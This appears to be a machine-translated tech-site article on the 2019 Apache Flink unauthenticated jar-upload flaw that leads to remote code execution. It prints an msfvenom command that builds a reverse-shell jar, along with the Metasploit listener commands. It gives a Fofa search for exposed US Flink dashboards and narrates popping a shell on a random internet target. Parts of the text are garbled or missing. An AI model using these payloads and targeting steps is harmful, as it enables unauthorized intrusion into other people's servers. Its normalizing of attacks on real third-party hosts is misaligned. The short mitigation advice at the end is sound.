Shulou(Shulou.com)05/31 Report--

This article introduces the example analysis of apache flink arbitrary jar package upload leading to remote code execution, the content is very detailed, interested friends can refer to, I hope it can be helpful to you.

Vulnerability description:

On November 11, 2019, security engineer Henry Chen disclosed a vulnerability in which Apache Flink did not authorize uploading jar packages that led to remote code execution. Since Apache Flink Dashboard can be accessed without authentication by default, shell can be obtained by uploading malicious jar packets and triggering malicious code execution.

Scope of influence

Export (Export)

b. Then select java-- > Runnable JAR file

c. Then select the corresponding java project and export path as well as the export file name

Picture

This generates a jar package that bounces shell

Msf generates jar horses:

(1) use msfvenom to generate a jar horse:

Msfvenom-p java/meterpreter/reverse_tcp LHOST=172.26.1.156 LPORT=9999 W > text.jar

(2) Open the listening module of msf and listen to port 9999 (to be the same as the port set by our Jarma)

Use exploit/multi/handlerset payload java/meterpreter/reverse_tcpset LHOST 172.26.1.156set LPORT 9999exploit

(3) after uploading the generated jar horse and submitting it (see the reproduction below for this operation), we can see that we have successfully received the shell:

Local recurrence:

(1) access target:

(2) Click Submit New job to open the page for uploading jar package:

(3) Click Add New to select the jar package we have made:

(4) listen to the port on our machine (the jar package we made bounces shell directly)

(5) Click the jar package we just uploaded:

(6) then click Submit to see that we have successfully received the shell:

Internet sites:

Fofa keywords:

"apache-flink-dashboard" & & country= "US"

(1) find a random target:

(2) Click Submit new Job to see that it allows us to upload jar packages.

(3) upload our jar package using flink upload jar package:

(4) after uploading, we listen to the port on our vps.

(5) then go back to the browser, select the jar package we just uploaded, and then click Submitting submit to see that our vps has successfully received the shell.

Vulnerability fixes:

It is recommended that you set a firewall policy to allow only whitelist ip access to the apache flink service, and add digest authentication to the service in the Web proxy, such as apache httpd.

Keep an eye on the official website and wait for a new version or patch to update

This is the example analysis of remote code execution caused by apache flink arbitrary jar package upload. I hope the above content can be of some help and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.